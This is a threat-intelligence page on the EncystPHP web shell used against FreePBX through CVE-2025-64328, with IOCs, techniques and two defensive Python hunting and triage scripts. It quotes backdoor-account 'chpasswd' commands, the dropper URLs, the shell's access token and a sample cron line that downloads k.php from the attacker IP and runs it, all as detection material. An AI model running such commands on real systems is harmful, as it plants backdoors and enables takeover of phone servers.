EncystPHP
EncystPHP is a PHP web shell targeting Sangoma FreePBX/Endpoint Manager environments. It has been observed since early December 2025 in campaigns exploiting CVE-2025-64328, a post-authentication command injection vulnerability in FreePBX, to gain execution as the asterisk user and deploy persistent web shells on internet-exposed VoIP/PBX servers. FortiGuard Labs named the malware EncystPHP and linked the activity to the financially motivated INJ3CTOR3 operation, which has a history of targeting VoIP infrastructure for toll fraud and related abuse.
High-confidence reported capabilities include remote command execution, persistence, and deployment of additional web shells/payloads. EncystPHP masquerades as legitimate FreePBX files, notably ajax.php, and in some reports presents an operator interface titled "Ask Master." It can enumerate the filesystem and processes, query active Asterisk channels, list SIP peers, and retrieve FreePBX and Elastix configuration files. Reported post-compromise actions include harvesting database configuration from /etc/freepbx.conf, creating a root-level local account named newfpbx with UID 0, resetting multiple account passwords, escalating privileges, injecting SSH public keys, modifying configuration to keep SSH port 22 open, deleting cron jobs and user accounts, removing competing web shells, deleting the Endpoint Manager module, restoring permissions to avoid service exceptions, and tampering with or deleting logs and temporary files for defense evasion.
Persistence is established through cron-based re-download and execution of additional droppers, including retrieval of k.php from 45.234.176.202 (crm.razatelefonia.pro). The malware and associated droppers were reported as Base64-encoded and decoded at runtime, with web shell copies placed across multiple web-accessible paths under the FreePBX web tree. Fortinet reported detections as PHP/EncystPHP.A!tr and BASH/EncystPHP.A!tr.
Observed indicators and infrastructure directly mentioned in reporting include 45.234.176.202, crm.razatelefonia.pro, hxxp://45.234.176.202/new/c, hxxp://45.234.176.202/new/k.php, and scanning/probing associated with 160.119.76.250. One observed web shell access pattern used a GET request to /admin/modules/phones/ajax.php with an md5 parameter containing the hard-coded string cf710203400b8c466e6dfcafcf36a411; reporting noted this value is compared as a string rather than validated as a true MD5 hash. EncystPHP has been widely reported in compromises of vulnerable FreePBX systems, with more than 900 infected FreePBX servers observed during the campaign wave.
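A hunt over web-server access logs for the access pattern described above, as an added example that is not code from the reporting, from Mallory, or from the malware. It assumes Apache combined-format log lines (constructed below); the path, the md5 token and the two IPs are the values named on this page, while the benign requests, client IPs and timestamps in the sample are made up. Because the shell compares the md5 parameter as a plain string, an exact match on the token is the signal, independent of which web-accessible path the copy was dropped at.

```python
"""Hunt web-server access logs for the EncystPHP ajax.php access pattern.

Added example; not code from Fortinet, Mallory, or the malware. The log lines
are constructed in Apache combined format. Values taken from the page: the
path /admin/modules/phones/ajax.php, the hard-coded md5 token
cf710203400b8c466e6dfcafcf36a411, and the IPs 45.234.176.202 and 160.119.76.250.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Hard-coded string the shell compares the md5 parameter against (from reporting).
# The shell does a plain string compare, so an exact match is the signal.
ENCYST_MD5_TOKEN = "cf710203400b8c466e6dfcafcf36a411"
# Infrastructure named in reporting: dropper host and probing source.
REPORTED_IPS = {"45.234.176.202", "160.119.76.250"}
# Reported location of the masquerading shell copy; copies were also placed at
# other web-accessible paths, so the token check below is path-independent.
REPORTED_SHELL_PATHS = {"/admin/modules/phones/ajax.php"}

# Apache combined / nginx default format:
#   ip ident user [timestamp] "METHOD target proto" status size ...
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs returns lists; keep the first value of each parameter.
    rec["query"] = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return rec


def classify(rec):
    """Return the reasons a request is suspicious (empty list if none)."""
    reasons = []
    if rec["query"].get("md5") == ENCYST_MD5_TOKEN:
        # Operator access to the shell, whatever path the copy was dropped at.
        reasons.append("hardcoded EncystPHP md5 token")
    if rec["ip"] in REPORTED_IPS:
        if rec["path"] in REPORTED_SHELL_PATHS:
            reasons.append("reported IP probing the masqueraded ajax.php path")
        else:
            reasons.append("request from IP named in EncystPHP reporting")
    return reasons


def hunt(lines):
    """Return (ip, method, target, status, reasons) for every suspicious line."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            hits.append((rec["ip"], rec["method"], rec["target"], rec["status"], reasons))
    return hits


# Constructed sample log: one benign admin request, one operator access using the
# token, one probe from a reported scanner IP, one benign request carrying a
# different md5 value (must not fire), and one request from the dropper host IP.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Dec/2025:10:01:02 +0000] "GET /admin/config.php HTTP/1.1" 200 5120
203.0.113.77 - - [12/Dec/2025:10:03:11 +0000] "GET /admin/modules/phones/ajax.php?md5=cf710203400b8c466e6dfcafcf36a411 HTTP/1.1" 200 312
160.119.76.250 - - [12/Dec/2025:10:04:40 +0000] "GET /admin/modules/phones/ajax.php HTTP/1.1" 404 196
198.51.100.5 - - [12/Dec/2025:10:05:00 +0000] "GET /admin/modules/phones/ajax.php?md5=d41d8cd98f00b204e9800998ecf8427e HTTP/1.1" 200 88
45.234.176.202 - - [12/Dec/2025:10:06:15 +0000] "GET /admin/ HTTP/1.1" 302 0
"""

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG.splitlines()):
        print(hit)
```

Run it against a real Apache or nginx access log by feeding the file's lines to `hunt()`; a request from an unlisted IP that carries a different, syntactically valid md5 value is deliberately not flagged, since the signal is the exact token, not the presence of the parameter.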
Vulnerabilities exploited
3 CVEs correlated with this family across public research and vendor advisories.
A sophisticated attack campaign leveraging a critical FreePBX vulnerability to deploy a persistent webshell dubbed “EncystPHP,” enabling threat actors to gain complete administrative control over compromised VoIP systems.
As recently as last week, Fortinet revealed the threat actor behind the activity has weaponized CVE-2025-64328 starting early December 2025 to deliver a web shell codenamed EncystPHP.
In 2022, the threat actor shifted its focus to the Elastix system via CVE-2021-45461. These incidents begin with the exploitation of a FreePBX vulnerability, followed by the deployment of a PHP web shell in the target environments.
FortiGuard Labs has discovered a web shell that we named “EncystPHP.” It features several advanced capabilities, including remote command execution, persistence mechanisms, and web shell deployment.
Groups observed using it
1 distinct threat actor attributed by public researchers.
Prior campaign generations were documented by Check Point Research in 2020, Palo Alto Unit 42 in 2022, and Fortinet in January 2026.
Techniques & procedures
29 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access (2 techniques)
Execution (4 techniques)
"Initial persistence is established through crontab entries that download the secondary dropper k.php every minute."
By leveraging Elastix and FreePBX administrative contexts, the web shell operates with elevated privileges, enabling arbitrary command execution on the compromised host...
Persistence (7 techniques)
"...resets multiple user account passwords to a single value, and injects SSH public keys to maintain backdoor access."
This version is also adding the following backdoor accounts: echo 'root:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e ... echo 'freepbxuser:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e
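A host-side triage of the persistence artifacts quoted in this section, as an added example that is not code from the reporting, from Mallory, or from the malware. It checks /etc/passwd for extra UID 0 accounts (the page reports newfpbx), /etc/shadow for accounts sharing a single hash (including the hash quoted above), and a crontab for an every-minute fetch of k.php from the reported dropper host. The passwd, shadow and crontab contents are constructed samples, and the exact fetch command in the cron line is an assumption, since the page only states the host, the file and the every-minute schedule.

```python
"""Triage a FreePBX host for the persistence artifacts reported for EncystPHP.

Added example; not code from Fortinet, Mallory, or the malware. It checks
three things the page reports: an extra UID 0 account (newfpbx), several
accounts reset to one password hash ($1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.), and
a crontab entry that fetches the k.php dropper from 45.234.176.202 every
minute. The passwd, shadow and crontab contents below are constructed samples;
the exact cron command line is an assumption, only the host, file name and
every-minute schedule come from reporting.
"""
import re
from collections import defaultdict

# Infrastructure from the page; the regex matches either the IP or the domain.
DROPPER_HOST_RE = re.compile(r"45\.234\.176\.202|crm\.razatelefonia\.pro")
DROPPER_FILE_RE = re.compile(r"\bk\.php\b")
# Hash quoted in the page's backdoor-account excerpt.
REPORTED_HASH = "$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p."


def find_extra_uid0(passwd_text):
    """Return account names other than root that have UID 0."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            found.append(fields[0])
    return found


def hash_map(shadow_text):
    """Map each real password hash in shadow(5) text to the accounts using it."""
    by_hash = defaultdict(list)
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue
        name, hashed = fields[0], fields[1]
        if hashed.startswith("$"):  # skip locked (!, !!, *) and empty entries
            by_hash[hashed].append(name)
    return dict(by_hash)


def find_shared_hashes(shadow_text):
    """Return only the hashes used by more than one account (mass password reset)."""
    return {h: users for h, users in hash_map(shadow_text).items() if len(users) > 1}


def find_dropper_crons(cron_text):
    """Return (every_minute, schedule, command) for cron lines touching the dropper."""
    hits = []
    for line in cron_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue
        schedule, command = " ".join(parts[:5]), parts[5]
        if DROPPER_HOST_RE.search(command) or DROPPER_FILE_RE.search(command):
            # "* * * * *" (or "*/1" in the minute field) runs every minute.
            every_minute = parts[0] in ("*", "*/1") and all(f == "*" for f in parts[1:5])
            hits.append((every_minute, schedule, command))
    return hits


def triage(passwd_text, shadow_text, cron_text):
    """Combine the three checks into one report dict."""
    return {
        "extra_uid0": find_extra_uid0(passwd_text),
        "shared_hashes": find_shared_hashes(shadow_text),
        "reported_hash_users": hash_map(shadow_text).get(REPORTED_HASH, []),
        "dropper_crons": find_dropper_crons(cron_text),
    }


# Constructed samples. Only root/freepbxuser carrying the reported hash and the
# newfpbx UID 0 account reflect the page; everything else is filler.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
asterisk:x:995:994::/var/lib/asterisk:/sbin/nologin
freepbxuser:x:1001:1001::/home/freepbxuser:/bin/bash
newfpbx:x:0:0::/home/newfpbx:/bin/bash
"""

SAMPLE_SHADOW = """\
root:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.:20434:0:99999:7:::
asterisk:!!:20000:0:99999:7:::
freepbxuser:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.:20434:0:99999:7:::
newfpbx:$6$constructed$placeholderhash:20434:0:99999:7:::
"""

# Assumed shape of the asterisk user's crontab; the fetch command is illustrative.
SAMPLE_CRON = """\
# m h dom mon dow command
* * * * * curl -s http://45.234.176.202/new/k.php -o /tmp/k.php && php /tmp/k.php
0 2 * * * /usr/sbin/logrotate /etc/logrotate.conf
"""

if __name__ == "__main__":
    for key, value in triage(SAMPLE_PASSWD, SAMPLE_SHADOW, SAMPLE_CRON).items():
        print(key, value)
```

On a live host, feed the real files (`/etc/passwd`, `/etc/shadow`, and `crontab -l -u asterisk` plus `/etc/cron.d/*`) to `triage()`; the shared-hash check catches the mass reset even if the hash differs from the one quoted here, and the cron check matches the dropper host by IP or domain regardless of the download tool used.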
Privilege Escalation (5 techniques)
Stealth (7 techniques)
"By mimicking legitimate FreePBX components, it attempts to 'evade immediate detection'"
“written to disk, masquerading as a legitimate FreePBX file named ajax.php… [and] forges timestamps to match those of legitimate files”
"EncystPHP also tampers with log files and disables error reporting to hinder forensic analysis and detection efforts."
Defense Impairment (2 techniques)
Credential Access (2 techniques)
Discovery (4 techniques)
The web shell also exposes an interactive interface that supports several predefined operational commands. This includes file system enumeration, process inspection... and retrieving multiple FreePBX and Elastix configuration files.
Lateral Movement (1 technique)
Command and Control (2 techniques)
Impact (1 technique)
IOCs tracked for this family
14 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
13 sources tracked across advisories, community write-ups, and news.
A source on a later generation of the same FreePBX-focused toll fraud activity references the January 2026 EncystPHP campaign and its dropper as an earlier generation preceding JOMANGY.
A web shell used by attackers compromising vulnerable FreePBX systems. It is accessed via a hard-coded string passed in the misleading "md5" parameter, and observed variants also add multiple backdoor accounts to the compromised host.
A web shell deployed onto vulnerable Sangoma FreePBX instances to enable remote command execution and persistent unauthorized access, reportedly running with elevated privileges.
A PHP web shell/dropper deployed after exploitation of CVE-2025-64328 in Sangoma FreePBX. Provides remote command execution and persistence, deploys additional web shells/payloads, performs system manipulation (e.g., locking key files, harvesting DB configs, deleting cron jobs and user accounts, removing rival web shells), establishes long-term access (creates root-level user, resets passwords, injects SSH key, keeps SSH/22 open), and conducts defense evasion (erases logs, restores permissions, removes the Endpoint Manager module).